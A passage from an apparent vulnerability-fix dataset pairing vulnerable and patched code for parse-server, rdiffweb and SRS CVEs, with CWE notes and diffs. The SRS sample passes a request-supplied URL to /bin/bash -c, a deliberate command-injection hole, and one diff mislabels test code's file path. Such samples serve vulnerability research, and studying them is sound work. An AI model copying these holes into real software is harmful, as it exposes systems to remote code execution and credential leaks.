ObjectId: %s', className, deletedParseObject.id);\n logger.verbose('Current client number : %d', this.clients.size);\n\n const classSubscriptions = this.subscriptions.get(className);\n if (typeof classSubscriptions === 'undefined') {\n logger.debug('Can not find subscriptions under this class ' + className);\n return;\n }\n for (const subscription of classSubscriptions.values()) {\n const isSubscriptionMatched = this._matchesSubscription(deletedParseObject, subscription);\n if (!isSubscriptionMatched) {\n continue;\n }\n for (const [clientId, requestIds] of _.entries(subscription.clientRequestIds)) {\n const client = this.clients.get(clientId);\n if (typeof client === 'undefined') {\n continue;\n }\n for (const requestId of requestIds) {\n const acl = 
message.currentParseObject.getACL();\n // Check CLP\n const op = this._getCLPOperation(subscription.query);\n let res = {};\n this._matchesCLP(classLevelPermissions, message.currentParseObject, client, requestId, op)\n .then(() => {\n // Check ACL\n return this._matchesACL(acl, client, requestId);\n })\n .then(isMatched => {\n if (!isMatched) {\n return null;\n }\n res = {\n event: 'delete',\n sessionToken: client.sessionToken,\n object: deletedParseObject,\n clients: this.clients.size,\n subscriptions: this.subscriptions.size,\n useMasterKey: client.hasMasterKey,\n installationId: client.installationId,\n sendEvent: true,\n };\n return maybeRunAfterEventTrigger('afterEvent', className, res);\n })\n .then(() => {\n if (!res.sendEvent) {\n return;\n }\n if (res.object && typeof res.object.toJSON === 'function') {\n deletedParseObject = res.object.toJSON();\n deletedParseObject.className = className;\n }\n if (\n (deletedParseObject.className === '_User' ||\n deletedParseObject.className === '_Session') &&\n !client.hasMasterKey\n ) {\n delete deletedParseObject.sessionToken;\n delete deletedParseObject.authData;\n }\n client.pushDelete(requestId, deletedParseObject);\n })\n .catch(error => {\n Client.pushError(\n client.parseWebSocket,\n error.code || 141,\n error.message || error,\n false,\n requestId\n );\n logger.error(\n `Failed running afterLiveQueryEvent on class ${className} for event ${res.event} with session ${res.sessionToken} with:\\n Error: ` +\n JSON.stringify(error)\n );\n });\n }\n }\n }\n }"}, {"id": "fix_js_251_2", "commit": "4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559", "file_path": "src/LiveQuery/ParseLiveQueryServer.js", "start_line": 212, "end_line": 359, "snippet": " _onAfterSave(message: any): void {\n logger.verbose(Parse.applicationId + 'afterSave is triggered');\n\n let originalParseObject = null;\n if (message.originalParseObject) {\n originalParseObject = message.originalParseObject.toJSON();\n }\n const classLevelPermissions = message.classLevelPermissions;\n let currentParseObject = message.currentParseObject.toJSON();\n const className = currentParseObject.className;\n logger.verbose('ClassName: %s | ObjectId: %s', className, currentParseObject.id);\n logger.verbose('Current client number : %d', this.clients.size);\n\n const classSubscriptions = this.subscriptions.get(className);\n if (typeof classSubscriptions === 'undefined') {\n logger.debug('Can not find subscriptions under this class ' + className);\n return;\n }\n for (const subscription of classSubscriptions.values()) {\n const isOriginalSubscriptionMatched = this._matchesSubscription(\n originalParseObject,\n subscription\n );\n const isCurrentSubscriptionMatched = this._matchesSubscription(\n currentParseObject,\n subscription\n );\n for (const [clientId, requestIds] of _.entries(subscription.clientRequestIds)) {\n const client = this.clients.get(clientId);\n if (typeof client === 'undefined') {\n continue;\n }\n for (const requestId of requestIds) {\n // Set orignal ParseObject ACL checking promise, if the object does not match\n // subscription, we do not need to check ACL\n let originalACLCheckingPromise;\n if (!isOriginalSubscriptionMatched) {\n originalACLCheckingPromise = Promise.resolve(false);\n } else {\n let originalACL;\n if (message.originalParseObject) {\n originalACL = message.originalParseObject.getACL();\n }\n originalACLCheckingPromise = this._matchesACL(originalACL, client, requestId);\n }\n // Set current ParseObject ACL checking promise, if the object does not match\n // subscription, 
we do not need to check ACL\n let currentACLCheckingPromise;\n let res = {};\n if (!isCurrentSubscriptionMatched) {\n currentACLCheckingPromise = Promise.resolve(false);\n } else {\n const currentACL = message.currentParseObject.getACL();\n currentACLCheckingPromise = this._matchesACL(currentACL, client, requestId);\n }\n const op = this._getCLPOperation(subscription.query);\n this._matchesCLP(classLevelPermissions, message.currentParseObject, client, requestId, op)\n .then(() => {\n return Promise.all([originalACLCheckingPromise, currentACLCheckingPromise]);\n })\n .then(([isOriginalMatched, isCurrentMatched]) => {\n logger.verbose(\n 'Original %j | Current %j | Match: %s, %s, %s, %s | Query: %s',\n originalParseObject,\n currentParseObject,\n isOriginalSubscriptionMatched,\n isCurrentSubscriptionMatched,\n isOriginalMatched,\n isCurrentMatched,\n subscription.hash\n );\n // Decide event type\n let type;\n if (isOriginalMatched && isCurrentMatched) {\n type = 'update';\n } else if (isOriginalMatched && !isCurrentMatched) {\n type = 'leave';\n } else if (!isOriginalMatched && isCurrentMatched) {\n if (originalParseObject) {\n type = 'enter';\n } else {\n type = 'create';\n }\n } else {\n return null;\n }\n message.event = type;\n res = {\n event: type,\n sessionToken: client.sessionToken,\n object: currentParseObject,\n original: originalParseObject,\n clients: this.clients.size,\n subscriptions: this.subscriptions.size,\n useMasterKey: client.hasMasterKey,\n installationId: client.installationId,\n sendEvent: true,\n };\n return maybeRunAfterEventTrigger('afterEvent', className, res);\n })\n .then(\n () => {\n if (!res.sendEvent) {\n return;\n }\n if (res.object && typeof res.object.toJSON === 'function') {\n currentParseObject = res.object.toJSON();\n currentParseObject.className = res.object.className || className;\n }\n\n if (res.original && typeof res.original.toJSON === 'function') {\n originalParseObject = res.original.toJSON();\n originalParseObject.className = res.original.className || className;\n }\n if (\n (currentParseObject.className === '_User' ||\n currentParseObject.className === '_Session') &&\n !client.hasMasterKey\n ) {\n delete currentParseObject.sessionToken;\n delete originalParseObject?.sessionToken;\n delete currentParseObject.authData;\n delete originalParseObject?.authData;\n }\n const functionName =\n 'push' + message.event.charAt(0).toUpperCase() + message.event.slice(1);\n if (client[functionName]) {\n client[functionName](requestId, currentParseObject, originalParseObject);\n }\n },\n error => {\n Client.pushError(\n client.parseWebSocket,\n error.code || 141,\n error.message || error,\n false,\n requestId\n );\n logger.error(\n `Failed running afterLiveQueryEvent on class ${className} for event ${res.event} with session ${res.sessionToken} with:\\n Error: ` +\n JSON.stringify(error)\n );\n }\n );\n }\n }\n }\n }"}, {"id": "fix_js_251_3", "commit": "4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559", "file_path": "spec/ParseLiveQuery.spec.js", "start_line": 931, "end_line": 976, "snippet": " it('should strip out session token in LiveQuery', async () => {\n await reconfigureServer({\n liveQuery: { classNames: ['_User'] },\n startLiveQueryServer: true,\n verbose: false,\n silent: true,\n });\n\n const user = new Parse.User();\n user.setUsername('username');\n user.setPassword('password');\n user.set('foo', 'bar');\n\n const query = new Parse.Query(Parse.User);\n query.equalTo('foo', 'bar');\n const subscription = await query.subscribe();\n\n const events = ['create', 
'update', 'enter', 'leave', 'delete'];\n const response = (obj, prev) => {\n expect(obj.get('sessionToken')).toBeUndefined();\n expect(obj.sessionToken).toBeUndefined();\n expect(prev?.sessionToken).toBeUndefined();\n if (prev && prev.get) {\n expect(prev.get('sessionToken')).toBeUndefined();\n }\n };\n const calls = {};\n for (const key of events) {\n calls[key] = response;\n spyOn(calls, key).and.callThrough();\n subscription.on(key, calls[key]);\n }\n await user.signUp();\n user.unset('foo');\n await user.save();\n user.set('foo', 'bar');\n await user.save();\n user.set('yolo', 'bar');\n await user.save();\n await user.destroy();\n await new Promise(resolve => process.nextTick(resolve));\n for (const key of events) {\n expect(calls[key]).toHaveBeenCalled();\n }\n });\n"}, {"id": "fix_js_251_4", "commit": "4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559", "file_path": "spec/ParseUser.spec.js", "start_line": 3932, "end_line": 3976, "snippet": " it('should strip out authdata in LiveQuery', async () => {\n const provider = getMockFacebookProvider();\n Parse.User._registerAuthenticationProvider(provider);\n\n await reconfigureServer({\n liveQuery: { classNames: ['_User'] },\n startLiveQueryServer: true,\n verbose: false,\n silent: true,\n });\n\n const query = new Parse.Query(Parse.User);\n query.doesNotExist('foo');\n const subscription = await query.subscribe();\n\n const events = ['create', 'update', 'enter', 'leave', 'delete'];\n const response = (obj, prev) => {\n expect(obj.get('authData')).toBeUndefined();\n expect(obj.authData).toBeUndefined();\n expect(prev?.authData).toBeUndefined();\n if (prev && prev.get) {\n expect(prev.get('authData')).toBeUndefined();\n }\n };\n const calls = {};\n for (const key of events) {\n calls[key] = response;\n spyOn(calls, key).and.callThrough();\n subscription.on(key, calls[key]);\n }\n const user = await Parse.User._logInWith('facebook');\n\n user.set('foo', 'bar');\n await user.save();\n user.unset('foo');\n await user.save();\n user.set('yolo', 'bar');\n await user.save();\n await user.destroy();\n await new Promise(resolve => process.nextTick(resolve));\n for (const key of events) {\n expect(calls[key]).toHaveBeenCalled();\n }\n });\n"}], "vul_patch": "--- a/src/LiveQuery/ParseLiveQueryServer.js\n+++ b/src/LiveQuery/ParseLiveQueryServer.js\n@@ -56,6 +56,14 @@\n deletedParseObject = res.object.toJSON();\n deletedParseObject.className = className;\n }\n+ if (\n+ (deletedParseObject.className === '_User' ||\n+ deletedParseObject.className === '_Session') &&\n+ !client.hasMasterKey\n+ ) {\n+ delete deletedParseObject.sessionToken;\n+ delete deletedParseObject.authData;\n+ }\n client.pushDelete(requestId, deletedParseObject);\n })\n .catch(error => {\n\n--- a/src/LiveQuery/ParseLiveQueryServer.js\n+++ b/src/LiveQuery/ParseLiveQueryServer.js\n@@ -112,6 +112,16 @@\n originalParseObject = res.original.toJSON();\n originalParseObject.className = res.original.className || className;\n }\n+ if (\n+ (currentParseObject.className === '_User' ||\n+ currentParseObject.className === '_Session') &&\n+ !client.hasMasterKey\n+ ) {\n+ delete currentParseObject.sessionToken;\n+ delete originalParseObject?.sessionToken;\n+ delete currentParseObject.authData;\n+ delete originalParseObject?.authData;\n+ }\n const functionName =\n 'push' + message.event.charAt(0).toUpperCase() + message.event.slice(1);\n if (client[functionName]) {\n\n--- /dev/null\n+++ b/src/LiveQuery/ParseLiveQueryServer.js\n@@ -0,0 +1,45 @@\n+ it('should strip out session token in LiveQuery', async () => 
{\n+ await reconfigureServer({\n+ liveQuery: { classNames: ['_User'] },\n+ startLiveQueryServer: true,\n+ verbose: false,\n+ silent: true,\n+ });\n+\n+ const user = new Parse.User();\n+ user.setUsername('username');\n+ user.setPassword('password');\n+ user.set('foo', 'bar');\n+\n+ const query = new Parse.Query(Parse.User);\n+ query.equalTo('foo', 'bar');\n+ const subscription = await query.subscribe();\n+\n+ const events = ['create', 'update', 'enter', 'leave', 'delete'];\n+ const response = (obj, prev) => {\n+ expect(obj.get('sessionToken')).toBeUndefined();\n+ expect(obj.sessionToken).toBeUndefined();\n+ expect(prev?.sessionToken).toBeUndefined();\n+ if (prev && prev.get) {\n+ expect(prev.get('sessionToken')).toBeUndefined();\n+ }\n+ };\n+ const calls = {};\n+ for (const key of events) {\n+ calls[key] = response;\n+ spyOn(calls, key).and.callThrough();\n+ subscription.on(key, calls[key]);\n+ }\n+ await user.signUp();\n+ user.unset('foo');\n+ await user.save();\n+ user.set('foo', 'bar');\n+ await user.save();\n+ user.set('yolo', 'bar');\n+ await user.save();\n+ await user.destroy();\n+ await new Promise(resolve => process.nextTick(resolve));\n+ for (const key of events) {\n+ expect(calls[key]).toHaveBeenCalled();\n+ }\n+ });\n\n--- /dev/null\n+++ b/src/LiveQuery/ParseLiveQueryServer.js\n@@ -0,0 +1,44 @@\n+ it('should strip out authdata in LiveQuery', async () => {\n+ const provider = getMockFacebookProvider();\n+ Parse.User._registerAuthenticationProvider(provider);\n+\n+ await reconfigureServer({\n+ liveQuery: { classNames: ['_User'] },\n+ startLiveQueryServer: true,\n+ verbose: false,\n+ silent: true,\n+ });\n+\n+ const query = new Parse.Query(Parse.User);\n+ query.doesNotExist('foo');\n+ const subscription = await query.subscribe();\n+\n+ const events = ['create', 'update', 'enter', 'leave', 'delete'];\n+ const response = (obj, prev) => {\n+ expect(obj.get('authData')).toBeUndefined();\n+ expect(obj.authData).toBeUndefined();\n+ expect(prev?.authData).toBeUndefined();\n+ if (prev && prev.get) {\n+ expect(prev.get('authData')).toBeUndefined();\n+ }\n+ };\n+ const calls = {};\n+ for (const key of events) {\n+ calls[key] = response;\n+ spyOn(calls, key).and.callThrough();\n+ subscription.on(key, calls[key]);\n+ }\n+ const user = await Parse.User._logInWith('facebook');\n+\n+ user.set('foo', 'bar');\n+ await user.save();\n+ user.unset('foo');\n+ await user.save();\n+ user.set('yolo', 'bar');\n+ await user.save();\n+ await user.destroy();\n+ await new Promise(resolve => process.nextTick(resolve));\n+ for (const key of events) {\n+ expect(calls[key]).toHaveBeenCalled();\n+ }\n+ });\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-4314", "cve_description": "Improper Privilege Management in GitHub repository ikus060/rdiffweb prior to 2.5.2.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": 
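The parse-server record closing above implements one rule: before a LiveQuery event is pushed, `sessionToken` and `authData` are deleted from `_User`/`_Session` payloads unless the client holds the master key. Reduced to a Python sketch (plain dictionaries stand in for serialized Parse objects):

```python
SENSITIVE_CLASSES = {"_User", "_Session"}
SENSITIVE_FIELDS = ("sessionToken", "authData")

def sanitize_payload(obj: dict, class_name: str, has_master_key: bool) -> dict:
    # Strip credentials from broadcast payloads for privileged classes
    # unless the subscriber authenticated with the master key.
    if class_name in SENSITIVE_CLASSES and not has_master_key:
        return {k: v for k, v in obj.items() if k not in SENSITIVE_FIELDS}
    return obj

user = {"objectId": "abc", "sessionToken": "r:secret", "foo": "bar"}
assert "sessionToken" not in sanitize_payload(user, "_User", False)
assert "sessionToken" in sanitize_payload(user, "_User", True)
```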
"https://github.com/ikus060/rdiffweb", "patch_url": ["https://github.com/ikus060/rdiffweb/commit/b2df3679564d0daa2856213bb307d3e34bd89a25"], "programing_language": "Python", "vul_func": [{"id": "vul_py_334_1", "commit": "979ab34", "file_path": "rdiffweb/core/librdiff.py", "start_line": 848, "end_line": 872, "snippet": " def __init__(self, user_root, path, encoding):\n if isinstance(user_root, str):\n user_root = os.fsencode(user_root)\n if isinstance(path, str):\n path = os.fsencode(path)\n assert isinstance(user_root, bytes)\n assert isinstance(path, bytes)\n assert encoding\n self._encoding = encodings.search_function(encoding)\n assert self._encoding\n self.path = path.strip(b\"/\")\n if self.path:\n self.full_path = os.path.normpath(os.path.join(user_root, self.path))\n else:\n self.full_path = os.path.normpath(user_root)\n\n # The location of rdiff-backup-data directory.\n self._data_path = os.path.join(self.full_path, RDIFF_BACKUP_DATA)\n assert isinstance(self._data_path, bytes)\n self._increment_path = os.path.join(self._data_path, INCREMENTS)\n self.current_mirror = MetadataDict(self, CurrentMirrorEntry)\n self.error_log = MetadataDict(self, LogEntry)\n self.mirror_metadata = MetadataDict(self, MirrorMetadataEntry)\n self.file_statistics = MetadataDict(self, FileStatisticsEntry)\n self.session_statistics = MetadataDict(self, SessionStatisticsEntry)"}, {"id": "vul_py_334_2", "commit": "979ab34", "file_path": "rdiffweb/core/librdiff.py", "start_line": 1083, "end_line": 1096, "snippet": " def get_display_name(self, path):\n \"\"\"\n Return proper display name of the given path according to repository encoding and quoted characters.\n \"\"\"\n assert isinstance(path, bytes)\n path = path.strip(b'/')\n if path in [b'.', b'']:\n # For repository we use either path if defined or the directory base name\n if not self.path:\n return self._decode(unquote(os.path.basename(self.full_path)))\n return self._decode(unquote(self.path))\n else:\n # For path, we use the dir name\n return self._decode(unquote(os.path.basename(path)))"}, {"id": "vul_py_334_3", "commit": "979ab34", "file_path": "rdiffweb/core/model/_repo.py", "start_line": 135, "end_line": 143, "snippet": " def __init_on_load__(self):\n RdiffRepo.__init__(\n self, self.user.user_root, self.repopath, encoding=self.encoding or RepoObject.DEFAULT_REPO_ENCODING\n )\n\n @property\n def displayname(self):\n # Repository displayName is the \"repopath\" too.\n return self.repopath.strip('/')"}, {"id": "vul_py_334_4", "commit": "979ab34", "file_path": "rdiffweb/core/rdw_templating.py", "start_line": 159, "end_line": 191, "snippet": "def url_for(*args, **kwargs):\n \"\"\"\n Generate a url for the given endpoint, path (*args) with parameters (**kwargs)\n\n This could be used to generate a path with userobject and repo object\n\n \"\"\"\n path = \"\"\n for chunk in args:\n if not chunk:\n continue\n if hasattr(chunk, 'owner') and hasattr(chunk, 'path'):\n # This is a RepoObject\n path += \"/\"\n path += chunk.owner\n path += \"/\"\n path += rdw_helpers.quote_url(chunk.path.strip(b\"/\"))\n elif hasattr(chunk, 'path'):\n # This is a DirEntry\n if chunk.path:\n path += \"/\"\n path += rdw_helpers.quote_url(chunk.path.strip(b\"/\"))\n elif chunk and isinstance(chunk, bytes):\n path += \"/\"\n path += rdw_helpers.quote_url(chunk.strip(b\"/\"))\n elif chunk and isinstance(chunk, str):\n path += \"/\"\n path += chunk.strip(\"/\")\n else:\n raise ValueError('invalid positional arguments, url_for accept str, bytes or RepoPath: %r' % chunk)\n # Sort the 
arguments to have predictable results.\n qs = [(k, v.epoch() if hasattr(v, 'epoch') else v) for k, v in sorted(kwargs.items()) if v is not None]\n return cherrypy.url(path=path, qs=qs)"}], "fix_func": [{"id": "fix_py_334_1", "commit": "b2df3679564d0daa2856213bb307d3e34bd89a25", "file_path": "rdiffweb/core/librdiff.py", "start_line": 848, "end_line": 867, "snippet": " def __init__(self, full_path, encoding):\n assert encoding, 'encoding is required'\n self._encoding = encodings.search_function(encoding)\n assert self._encoding, 'encoding must be a valid charset'\n\n # Validate and sanitize the full_path\n assert full_path, 'full path is required'\n self.full_path = os.fsencode(full_path) if isinstance(full_path, str) else full_path\n assert os.path.isabs(self.full_path), 'full_path must be absolute path'\n self.full_path = os.path.normpath(self.full_path)\n\n # The location of rdiff-backup-data directory.\n self._data_path = os.path.join(self.full_path, RDIFF_BACKUP_DATA)\n assert isinstance(self._data_path, bytes)\n self._increment_path = os.path.join(self._data_path, INCREMENTS)\n self.current_mirror = MetadataDict(self, CurrentMirrorEntry)\n self.error_log = MetadataDict(self, LogEntry)\n self.mirror_metadata = MetadataDict(self, MirrorMetadataEntry)\n self.file_statistics = MetadataDict(self, FileStatisticsEntry)\n self.session_statistics = MetadataDict(self, SessionStatisticsEntry)"}, {"id": "fix_py_334_2", "commit": "b2df3679564d0daa2856213bb307d3e34bd89a25", "file_path": "rdiffweb/core/librdiff.py", "start_line": 1078, "end_line": 1089, "snippet": " def get_display_name(self, path):\n \"\"\"\n Return proper display name of the given path according to repository encoding and quoted characters.\n \"\"\"\n assert isinstance(path, bytes)\n path = path.strip(b'/')\n if path in [b'.', b'']:\n # For repository the directory base name\n return self._decode(unquote(os.path.basename(self.full_path)))\n else:\n # For path, we use the dir name\n return self._decode(unquote(os.path.basename(path)))"}, {"id": "fix_py_334_3", "commit": "b2df3679564d0daa2856213bb307d3e34bd89a25", "file_path": "rdiffweb/core/model/_repo.py", "start_line": 135, "end_line": 143, "snippet": " def __init_on_load__(self):\n # RdiffRepo required an absolute full path, When the user_root is invalid, let generate an invalid full path.\n if not self.user.user_root:\n full_path = os.path.join('/user_has_an_empty_user_root/', self.repopath.strip('/'))\n elif not os.path.isabs(self.user.user_root):\n full_path = os.path.join('/user_has_a_relative_user_root/', self.repopath.strip('/'))\n else:\n full_path = os.path.join(self.user.user_root, self.repopath.strip('/'))\n RdiffRepo.__init__(self, full_path, encoding=self.encoding or RepoObject.DEFAULT_REPO_ENCODING)"}, {"id": "fix_py_334_4", "commit": "b2df3679564d0daa2856213bb307d3e34bd89a25", "file_path": "rdiffweb/core/rdw_templating.py", "start_line": 159, "end_line": 191, "snippet": "def url_for(*args, **kwargs):\n \"\"\"\n Generate a url for the given endpoint, path (*args) with parameters (**kwargs)\n\n This could be used to generate a path with userobject and repo object\n\n \"\"\"\n path = \"\"\n for chunk in args:\n if not chunk:\n continue\n if hasattr(chunk, 'owner') and hasattr(chunk, 'repopath'):\n # This is a RepoObject\n path += \"/\"\n path += chunk.owner\n path += \"/\"\n path += rdw_helpers.quote_url(chunk.repopath.strip(\"/\"))\n elif hasattr(chunk, 'path'):\n # This is a DirEntry\n if chunk.path:\n path += \"/\"\n path += 
rdw_helpers.quote_url(chunk.path.strip(b\"/\"))\n elif chunk and isinstance(chunk, bytes):\n path += \"/\"\n path += rdw_helpers.quote_url(chunk.strip(b\"/\"))\n elif chunk and isinstance(chunk, str):\n path += \"/\"\n path += chunk.strip(\"/\")\n else:\n raise ValueError('invalid positional arguments, url_for accept str, bytes or RepoPath: %r' % chunk)\n # Sort the arguments to have predictable results.\n qs = [(k, v.epoch() if hasattr(v, 'epoch') else v) for k, v in sorted(kwargs.items()) if v is not None]\n return cherrypy.url(path=path, qs=qs)"}], "vul_patch": "--- a/rdiffweb/core/librdiff.py\n+++ b/rdiffweb/core/librdiff.py\n@@ -1,18 +1,13 @@\n- def __init__(self, user_root, path, encoding):\n- if isinstance(user_root, str):\n- user_root = os.fsencode(user_root)\n- if isinstance(path, str):\n- path = os.fsencode(path)\n- assert isinstance(user_root, bytes)\n- assert isinstance(path, bytes)\n- assert encoding\n+ def __init__(self, full_path, encoding):\n+ assert encoding, 'encoding is required'\n self._encoding = encodings.search_function(encoding)\n- assert self._encoding\n- self.path = path.strip(b\"/\")\n- if self.path:\n- self.full_path = os.path.normpath(os.path.join(user_root, self.path))\n- else:\n- self.full_path = os.path.normpath(user_root)\n+ assert self._encoding, 'encoding must be a valid charset'\n+\n+ # Validate and sanitize the full_path\n+ assert full_path, 'full path is required'\n+ self.full_path = os.fsencode(full_path) if isinstance(full_path, str) else full_path\n+ assert os.path.isabs(self.full_path), 'full_path must be absolute path'\n+ self.full_path = os.path.normpath(self.full_path)\n \n # The location of rdiff-backup-data directory.\n self._data_path = os.path.join(self.full_path, RDIFF_BACKUP_DATA)\n\n--- a/rdiffweb/core/librdiff.py\n+++ b/rdiffweb/core/librdiff.py\n@@ -5,10 +5,8 @@\n assert isinstance(path, bytes)\n path = path.strip(b'/')\n if path in [b'.', b'']:\n- # For repository we use either path if defined or the directory base name\n- if not self.path:\n- return self._decode(unquote(os.path.basename(self.full_path)))\n- return self._decode(unquote(self.path))\n+ # For repository the directory base name\n+ return self._decode(unquote(os.path.basename(self.full_path)))\n else:\n # For path, we use the dir name\n return self._decode(unquote(os.path.basename(path)))\n\n--- a/rdiffweb/core/model/_repo.py\n+++ b/rdiffweb/core/model/_repo.py\n@@ -1,9 +1,9 @@\n def __init_on_load__(self):\n- RdiffRepo.__init__(\n- self, self.user.user_root, self.repopath, encoding=self.encoding or RepoObject.DEFAULT_REPO_ENCODING\n- )\n-\n- @property\n- def displayname(self):\n- # Repository displayName is the \"repopath\" too.\n- return self.repopath.strip('/')\n+ # RdiffRepo required an absolute full path, When the user_root is invalid, let generate an invalid full path.\n+ if not self.user.user_root:\n+ full_path = os.path.join('/user_has_an_empty_user_root/', self.repopath.strip('/'))\n+ elif not os.path.isabs(self.user.user_root):\n+ full_path = os.path.join('/user_has_a_relative_user_root/', self.repopath.strip('/'))\n+ else:\n+ full_path = os.path.join(self.user.user_root, self.repopath.strip('/'))\n+ RdiffRepo.__init__(self, full_path, encoding=self.encoding or RepoObject.DEFAULT_REPO_ENCODING)\n\n--- a/rdiffweb/core/rdw_templating.py\n+++ b/rdiffweb/core/rdw_templating.py\n@@ -9,12 +9,12 @@\n for chunk in args:\n if not chunk:\n continue\n- if hasattr(chunk, 'owner') and hasattr(chunk, 'path'):\n+ if hasattr(chunk, 'owner') and hasattr(chunk, 'repopath'):\n # 
This is a RepoObject\n path += \"/\"\n path += chunk.owner\n path += \"/\"\n- path += rdw_helpers.quote_url(chunk.path.strip(b\"/\"))\n+ path += rdw_helpers.quote_url(chunk.repopath.strip(\"/\"))\n elif hasattr(chunk, 'path'):\n # This is a DirEntry\n if chunk.path:\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-34105", "cve_description": "SRS is a real-time video server supporting RTMP, WebRTC, HLS, HTTP-FLV, SRT, MPEG-DASH, and GB28181. Prior to versions 5.0.157, 5.0-b1, and 6.0.48, SRS's `api-server` server is vulnerable to a drive-by command injection. An attacker may send a request to the `/api/v1/snapshots` endpoint containing any commands to be executed as part of the body of the POST request. This issue may lead to Remote Code Execution (RCE). Versions 5.0.157, 5.0-b1, and 6.0.48 contain a fix.", "cwe_info": {"CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}}, "repo": "https://github.com/ossrs/srs", "patch_url": ["https://github.com/ossrs/srs/commit/1d878c2daaf913ad01c6d0bc2f247116c8050338"], "programing_language": "Go", "vul_func": [{"id": "vul_go_261_1", "commit": "df854339ea19847e80f442e11f7506d1b7883152", "file_path": "trunk/research/api-server/server.go", "start_line": 393, "end_line": 430, "snippet": "func (v *SnapshotJob) do(ffmpegPath, inputUrl string) (err error) {\n\toutputPicDir := path.Join(StaticDir, v.App)\n\tif err = os.MkdirAll(outputPicDir, 0777); err != nil {\n\t\tlog.Println(fmt.Sprintf(\"create snapshot image dir:%v failed, err is %v\", outputPicDir, err))\n\t\treturn\n\t}\n\n\tnormalPicPath := path.Join(outputPicDir, fmt.Sprintf(\"%v\", v.Stream)+\"-%03d.png\")\n\tbestPng := path.Join(outputPicDir, fmt.Sprintf(\"%v-best.png\", v.Stream))\n\n\tparam := fmt.Sprintf(\"%v -i %v -vf fps=1 -vcodec png -f image2 -an -y -vframes %v -y %v\", ffmpegPath, inputUrl, v.vframes, normalPicPath)\n\tlog.Println(fmt.Sprintf(\"start snapshot, cmd param=%v\", param))\n\ttimeoutCtx, _ := context.WithTimeout(v.cancelCtx, v.timeout)\n\tcmd := exec.CommandContext(timeoutCtx, \"/bin/bash\", \"-c\", param)\n\tif err = cmd.Run(); err != nil {\n\t\tlog.Println(fmt.Sprintf(\"run snapshot %v cmd failed, err is %v\", v.Tag(), err))\n\t\treturn\n\t}\n\n\tbestFileSize := int64(0)\n\tfor i := 1; i <= v.vframes; i++ {\n\t\tpic := path.Join(outputPicDir, fmt.Sprintf(\"%v-%03d.png\", v.Stream, i))\n\t\tfi, err := os.Stat(pic)\n\t\tif err != nil {\n\t\t\tlog.Println(fmt.Sprintf(\"stat pic:%v failed, err is %v\", pic, err))\n\t\t\tcontinue\n\t\t}\n\t\tif bestFileSize == 0 {\n\t\t\tbestFileSize = fi.Size()\n\t\t} else if fi.Size() > bestFileSize {\n\t\t\tos.Remove(bestPng)\n\t\t\tos.Symlink(pic, bestPng)\n\t\t\tbestFileSize = fi.Size()\n\t\t}\n\t}\n\tlog.Println(fmt.Sprintf(\"%v the best thumbnail is %v\", v.Tag(), bestPng))\n\treturn\n}"}], "fix_func": [{"id": "fix_go_261_1", "commit": "1d878c2daaf913ad01c6d0bc2f247116c8050338", "file_path": "trunk/research/api-server/server.go", "start_line": 393, "end_line": 438, "snippet": "func (v *SnapshotJob) do(ffmpegPath, inputUrl string) (err error) {\n\toutputPicDir := path.Join(StaticDir, v.App)\n\tif err = os.MkdirAll(outputPicDir, 0777); err != nil {\n\t\tlog.Println(fmt.Sprintf(\"create snapshot 
image dir:%v failed, err is %v\", outputPicDir, err))\n\t\treturn\n\t}\n\n\tnormalPicPath := path.Join(outputPicDir, fmt.Sprintf(\"%v\", v.Stream)+\"-%03d.png\")\n\tbestPng := path.Join(outputPicDir, fmt.Sprintf(\"%v-best.png\", v.Stream))\n\n\tparams := []string{\n\t\t\"-i\", inputUrl,\n\t\t\"-vf\", \"fps=1\",\n\t\t\"-vcodec\", \"png\",\n\t\t\"-f\", \"image2\",\n\t\t\"-an\",\n\t\t\"-vframes\", strconv.Itoa(v.vframes),\n\t\t\"-y\", normalPicPath,\n\t}\n\tlog.Println(fmt.Sprintf(\"start snapshot, cmd param=%v %v\", ffmpegPath, strings.Join(params, \" \")))\n\ttimeoutCtx, _ := context.WithTimeout(v.cancelCtx, v.timeout)\n\tcmd := exec.CommandContext(timeoutCtx, ffmpegPath, params...)\n\tif err = cmd.Run(); err != nil {\n\t\tlog.Println(fmt.Sprintf(\"run snapshot %v cmd failed, err is %v\", v.Tag(), err))\n\t\treturn\n\t}\n\n\tbestFileSize := int64(0)\n\tfor i := 1; i <= v.vframes; i++ {\n\t\tpic := path.Join(outputPicDir, fmt.Sprintf(\"%v-%03d.png\", v.Stream, i))\n\t\tfi, err := os.Stat(pic)\n\t\tif err != nil {\n\t\t\tlog.Println(fmt.Sprintf(\"stat pic:%v failed, err is %v\", pic, err))\n\t\t\tcontinue\n\t\t}\n\t\tif bestFileSize == 0 {\n\t\t\tbestFileSize = fi.Size()\n\t\t} else if fi.Size() > bestFileSize {\n\t\t\tos.Remove(bestPng)\n\t\t\tos.Symlink(pic, bestPng)\n\t\t\tbestFileSize = fi.Size()\n\t\t}\n\t}\n\tlog.Println(fmt.Sprintf(\"%v the best thumbnail is %v\", v.Tag(), bestPng))\n\treturn\n}"}], "vul_patch": "--- a/trunk/research/api-server/server.go\n+++ b/trunk/research/api-server/server.go\n@@ -8,10 +8,18 @@\n \tnormalPicPath := path.Join(outputPicDir, fmt.Sprintf(\"%v\", v.Stream)+\"-%03d.png\")\n \tbestPng := path.Join(outputPicDir, fmt.Sprintf(\"%v-best.png\", v.Stream))\n \n-\tparam := fmt.Sprintf(\"%v -i %v -vf fps=1 -vcodec png -f image2 -an -y -vframes %v -y %v\", ffmpegPath, inputUrl, v.vframes, normalPicPath)\n-\tlog.Println(fmt.Sprintf(\"start snapshot, cmd 